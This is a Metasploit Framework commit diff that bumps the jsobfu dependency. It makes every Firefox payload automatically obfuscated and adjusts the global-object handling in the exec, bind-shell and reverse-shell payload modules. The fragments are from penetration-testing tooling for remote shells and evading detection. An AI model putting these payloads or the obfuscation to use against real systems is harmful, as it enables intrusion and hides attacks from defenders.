Install a global object in firefox payloads, bump jsobfu.

Author: jvennix-r7

Gemfile.lock

@@ -5,7 +5,7 @@ PATH
       actionpack (< 4.0.0)
       activesupport (>= 3.0.0, < 4.0.0)
       bcrypt
-      jsobfu (~> 0.1.7)
+      jsobfu (~> 0.2.0)
       json
       metasploit-concern (~> 0.2.1)
       metasploit-model (~> 0.27.1)
@@ -91,7 +91,7 @@ GEM
     hike (1.2.3)
     i18n (0.6.11)
     journey (1.0.4)
-    jsobfu (0.1.7)
+    jsobfu (0.2.0)
       rkelly-remix (= 0.0.6)
     json (1.8.1)
     mail (2.5.4)

lib/msf/core/exploit/remote/firefox_privilege_escalation.rb

@@ -12,6 +12,7 @@
 module Msf
 module Exploit::Remote::FirefoxPrivilegeEscalation
 
+  # automatically obfuscate anything that runs through `js_exec`
   include Msf::Exploit::JSObfu
 
   # Sends the +js+ code to the remote session, which executes it in Firefox's

lib/msf/core/payload/firefox.rb

@@ -1,9 +1,13 @@
 # -*- coding: binary -*-
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 require 'json'
 
 module Msf::Payload::Firefox
 
+  # automatically obfuscate every Firefox payload
+  include Msf::Exploit::JSObfu
+
   # Javascript source code of setTimeout(fn, delay)
   # @return [String] javascript source code that exposes the setTimeout(fn, delay) method
   def set_timeout_source
@@ -121,16 +125,15 @@ def run_cmd_source
           var retVal = null;
 
           try {
-            retVal = Function(js[1]).call({
-              send: function(r){
-                if (sent) return;
-                sent = true;
-                if (r) {
-                  if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
-                  else      cb(false, r+tag+"\\n");
-                }
+            this.send = function(r){
+              if (sent) return;
+              sent = true;
+              if (r) {
+                if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
+                else      cb(false, r+tag+"\\n");
               }
-            });
+            };
+            retVal = Function(js[1]).call(this);
           } catch (e) { retVal = e.message; }
 
           sync = false;

metasploit-framework.gemspec

@@ -56,7 +56,7 @@ Gem::Specification.new do |spec|
   # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
   spec.add_runtime_dependency 'bcrypt'
   # Needed for Javascript obfuscation
-  spec.add_runtime_dependency 'jsobfu', '~> 0.1.7'
+  spec.add_runtime_dependency 'jsobfu', '~> 0.2.0'
   # Needed for some admin modules (scrutinizer_add_user.rb)
   spec.add_runtime_dependency 'json'
   # Metasploit::Concern hooks

modules/payloads/singles/firefox/exec.rb

@@ -34,6 +34,7 @@ def generate
     <<-EOS
 
       (function(){
+        window = this;
         #{read_file_source if datastore['WSCRIPT']}
         #{run_cmd_source if datastore['WSCRIPT']}
 

modules/payloads/singles/firefox/shell_bind_tcp.rb

@@ -34,6 +34,7 @@ def initialize(info = {})
   def generate
     %Q|
     (function(){
+      window = this;
       Components.utils.import("resource://gre/modules/NetUtil.jsm");
       var lport = #{datastore["LPORT"]};
       var rhost = "#{datastore['RHOST']}";

modules/payloads/singles/firefox/shell_reverse_tcp.rb

@@ -32,6 +32,8 @@ def generate
     <<-EOS
 
       (function(){
+        window = this;
+
         Components.utils.import("resource://gre/modules/NetUtil.jsm");
         var host = '#{datastore["LHOST"]}';
         var port = #{datastore["LPORT"]};